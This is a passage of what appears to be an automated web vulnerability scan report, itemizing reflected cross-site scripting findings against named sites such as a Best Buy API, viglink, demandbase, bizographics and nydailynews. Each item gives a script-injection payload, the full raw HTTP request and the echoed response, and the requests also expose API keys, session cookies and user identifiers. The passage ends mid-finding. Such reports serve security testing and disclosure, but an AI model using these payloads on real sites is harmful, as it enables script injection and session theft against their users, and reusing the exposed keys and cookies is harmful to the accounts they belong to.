1.169. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [pageSize parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(sku%20in(8412292)&(departmentId=3))

Issue detail

The value of the pageSize request parameter is copied into the HTML document as plain text between tags. The payload d5e64<script>alert(1)</script>484527ebd4e was submitted in the pageSize parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(sku%20in(8412292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99d5e64<script>alert(1)</script>484527ebd4e&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olspage.jsp?id=pcat17005&type=page&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&cp=1&_requestid=38491
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'SRCL','page':'Search%20Results','searchLastPage':'Search%20Results','lastCatId':'pcat17071','lid':'Add+To+Cart','tab':'["ipt%3AfnAddToCartFromSearch%28%271181831568242%27%2C%278412292%27%2C%271%27%29"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DSearch%252520Results%2526pidt%253D1%2526oid%253Djavascript%25253AfnAddToCartFromSearch('1181831568242'%25252C'8412292'%25252C'1')_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2Folstemplatemapper.jsp%22%2C%22pv%22%3A2%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%2C%22bbyKeyWords%22%3A%22na%22%2C%22CartProds%22%3A%228412292%2C1211393%2C9984558%2C2044283%2C2077114%2C1257903%22%7D%2C%22f%22%3A1313106572865%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; CART=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; CART_CONFIRM=4a66d5aabc3c209fdefc00f9c01a96aa; fsr.a=1313106576228

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "9f3a6c2d1a0f6542ce664baf7784469a"
X-Runtime: 3
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2456
Date: Thu, 11 Aug 2011 23:50:14 GMT

busopsLow.BTP.retLoadBTPSKUs({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<Your
...[SNIP]...
12292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99d5e64<script>alert(1)</script>484527ebd4e&format=json'",
"status": "400 Bad Request"
}
})

1.170. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [show parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(sku%20in(8412292)&(departmentId=3))

Issue detail

The value of the show request parameter is copied into the HTML document as plain text between tags. The payload 6c6ee<script>alert(1)</script>9c6093a9606 was submitted in the show parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(sku%20in(8412292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku6c6ee<script>alert(1)</script>9c6093a9606&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olspage.jsp?id=pcat17005&type=page&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&cp=1&_requestid=38491
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'SRCL','page':'Search%20Results','searchLastPage':'Search%20Results','lastCatId':'pcat17071','lid':'Add+To+Cart','tab':'["ipt%3AfnAddToCartFromSearch%28%271181831568242%27%2C%278412292%27%2C%271%27%29"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DSearch%252520Results%2526pidt%253D1%2526oid%253Djavascript%25253AfnAddToCartFromSearch('1181831568242'%25252C'8412292'%25252C'1')_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2Folstemplatemapper.jsp%22%2C%22pv%22%3A2%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%2C%22bbyKeyWords%22%3A%22na%22%2C%22CartProds%22%3A%228412292%2C1211393%2C9984558%2C2044283%2C2077114%2C1257903%22%7D%2C%22f%22%3A1313106572865%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; CART=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; CART_CONFIRM=4a66d5aabc3c209fdefc00f9c01a96aa; fsr.a=1313106576228

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web3.ATL
Etag: "9d76a63d9b3373d9fde5abdd13e2c8c9"
X-Runtime: 3
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2456
Date: Thu, 11 Aug 2011 23:50:09 GMT

busopsLow.BTP.retLoadBTPSKUs({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<Your
...[SNIP]...
],
"code": 400,
"message": "Couldn't understand '/v1/products(sku in(8412292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku6c6ee<script>alert(1)</script>9c6093a9606&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99&format=json'",
"status": "400 Bad Request"
}
})

1.171. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload f3a73<script>alert(1)</script>d98aef6a709 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wdsf3a73<script>alert(1)</script>d98aef6a709&admeld_user_id=64775c16-cf5b-479e-8b02-d11a229fedb4&callback_url=http%3A%2F%2Ftag%2Eadmeld%2Ecom%2Fpixel%3Fadmeld%5Fdataprovider%5Fid%3D4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/homepage_atf?t=1313102149864&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXSH5Dnsisghkaj5XcunNcMDa7Re6IGD4lBDMrHLjNQH9Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQisoAFDZgxHJAX1nSmuONzqEVUJBxdqAyCgQ2DU8QwOXXYR472xAuokuJrWsMNDohYipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Thu, 11 Aug 2011 22:35:36 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 84
Connection: keep-alive

Unknown API key: (8dn4jnyemg4ky9svqgs28wdsf3a73<script>alert(1)</script>d98aef6a709)

1.172. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload 30842<script>alert(1)</script>de1b16eacb5 was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wds&admeld_user_id=64775c16-cf5b-479e-8b02-d11a229fedb4&callback_url=30842<script>alert(1)</script>de1b16eacb5 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/homepage_atf?t=1313102149864&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXSH5Dnsisghkaj5XcunNcMDa7Re6IGD4lBDMrHLjNQH9Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQisoAFDZgxHJAX1nSmuONzqEVUJBxdqAyCgQ2DU8QwOXXYR472xAuokuJrWsMNDohYipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Thu, 11 Aug 2011 22:36:13 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: 30842<script>alert(1)</script>de1b16eacb5

1.173. http://api.demandbase.com/api/v2/ip.js [var parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.demandbase.com
Path:   /api/v2/ip.js

Issue detail

The value of the var request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 31774%3balert(1)//23ded926607 was submitted in the var parameter. This input was echoed as 31774;alert(1)//23ded926607 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/v2/ip.js?key=e4086fa3ea9d74ac2aae2719a0e5285dc7075d7b&var=s_dmdbase_v_131774%3balert(1)//23ded926607&rnd=3023 HTTP/1.1
Host: api.demandbase.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.adobe.com/cfusion/search/index.cfm?term=xss&siteSection=solutions.html&loc=en_us&9ea5a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3b867a7c636=1
Cookie: _jsuid=1110217733238110538; __utma=67952772.705302637.1314726715.1314726715.1314726715.1; __utmz=67952772.1314726715.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Api-Version: v2
Content-Type: application/javascript;charset=utf-8
Date: Wed, 31 Aug 2011 13:11:55 GMT
Server: nginx/1.0.4
Status: 200 OK
Vary: Accept-Encoding
Content-Length: 367
Connection: keep-alive

var s_dmdbase_v_131774;alert(1)//23ded926607={"registry_longitude":-96.8207015991211,"registry_country_code":"US","registry_state":"TX","registry_city":"Dallas","registry_latitude":32.7825012207031,"isp":true,"registry_zip_code":"75207","registr
...[SNIP]...

1.174. http://api.viglink.com/api/ping [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/ping

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 633b6<script>alert(1)</script>513203d4fd6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ping633b6<script>alert(1)</script>513203d4fd6?format=jsonp&drKey=1203&loc=http%3A%2F%2Fforums.macnn.com%2F90%2Fmac-os-x%2F114884%2Fadd-radio-stations-itunes-os-x%2F&v=1&jsonp=vglnk_jsonp_13171776967450 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Origin: http://forums.macnn.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://forums.macnn.com/90/mac-os-x/114884/add-radio-stations-itunes-os-x/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=5e226a1c4d529824374eed76438f0dc6

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/plain
Date: Wed, 28 Sep 2011 02:56:57 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Set-Cookie: JSESSIONID=D38425AB4D2AD9D2B680E50A963C5D18; Path=/
Content-Length: 72
Connection: keep-alive

Unknown API method: /api/ping633b6<script>alert(1)</script>513203d4fd6

1.175. http://api.viglink.com/api/ping [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/ping

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 8a155<script>alert(1)</script>ba76e2d9a34 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ping?format=jsonp&drKey=1203&loc=http%3A%2F%2Fforums.macnn.com%2F90%2Fmac-os-x%2F114884%2Fadd-radio-stations-itunes-os-x%2F&v=1&jsonp=vglnk_jsonp_131717769674508a155<script>alert(1)</script>ba76e2d9a34 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Origin: http://forums.macnn.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://forums.macnn.com/90/mac-os-x/114884/add-radio-stations-itunes-os-x/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=5e226a1c4d529824374eed76438f0dc6

Response

HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http://forums.macnn.com
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en-US
Content-Type: text/javascript;charset=UTF-8
Date: Wed, 28 Sep 2011 02:55:21 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Content-Length: 160
Connection: keep-alive

vglnk_jsonp_131717769674508a155<script>alert(1)</script>ba76e2d9a34(1317178521178,2000,[],[],{"plugins":{},"timeClick":true,"debug":false,"timePing":false},[]);

1.176. http://assets.nydailynews.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8425'%3balert(1)//f2815976b98 was submitted in the REST URL parameter 1. This input was echoed as a8425';alert(1)//f2815976b98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icoa8425'%3balert(1)//f2815976b98 HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/errorpage/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.8.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000563892833=MtYkkj3J|aLQx8WrLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|o|o|o|M|8M8M8YsoH0|o

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:51:01 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69729
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/favicon.icoa8425';alert(1)//f2815976b98';
}
//-->
...[SNIP]...

1.177. http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /img/2011/08/12/alg_charla-nash_surgery.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa7d9'%3balert(1)//101192a7b4c was submitted in the REST URL parameter 1. This input was echoed as aa7d9';alert(1)//101192a7b4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imgaa7d9'%3balert(1)//101192a7b4c/2011/08/12/alg_charla-nash_surgery.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/news/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.3.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=-1

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:45:17 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69760
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/imgaa7d9';alert(1)//101192a7b4c/2011/08/12/alg_charla-nash_surgery.jpg';
}
//-->
...[SNIP]...

1.178. http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /img/2011/08/12/alg_charla-nash_surgery.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d79f4'%3balert(1)//1ef7a89ad08 was submitted in the REST URL parameter 2. This input was echoed as d79f4';alert(1)//1ef7a89ad08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /img/2011d79f4'%3balert(1)//1ef7a89ad08/08/12/alg_charla-nash_surgery.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/news/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.3.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=-1

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:45:35 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 69760
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/img/2011d79f4';alert(1)//1ef7a89ad08/08/12/alg_charla-nash_surgery.jpg';
}
//-->
...[SNIP]...

1.179. http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /img/2011/08/12/alg_charla-nash_surgery.jpg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a069'%3balert(1)//a554b3287db was submitted in the REST URL parameter 3. This input was echoed as 8a069';alert(1)//a554b3287db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /img/2011/088a069'%3balert(1)//a554b3287db/12/alg_charla-nash_surgery.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; tmq=kvqD%3DT%3BkvqT%3DT%3Bkvq2789%3DT%3Bkvq2413%3DT%3Bkvq2079%3DT%3Bkvq1129%3DT%3Bkvq1128%3DT%3Bkvq773%3DT; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/news/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.3.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=-1

Response

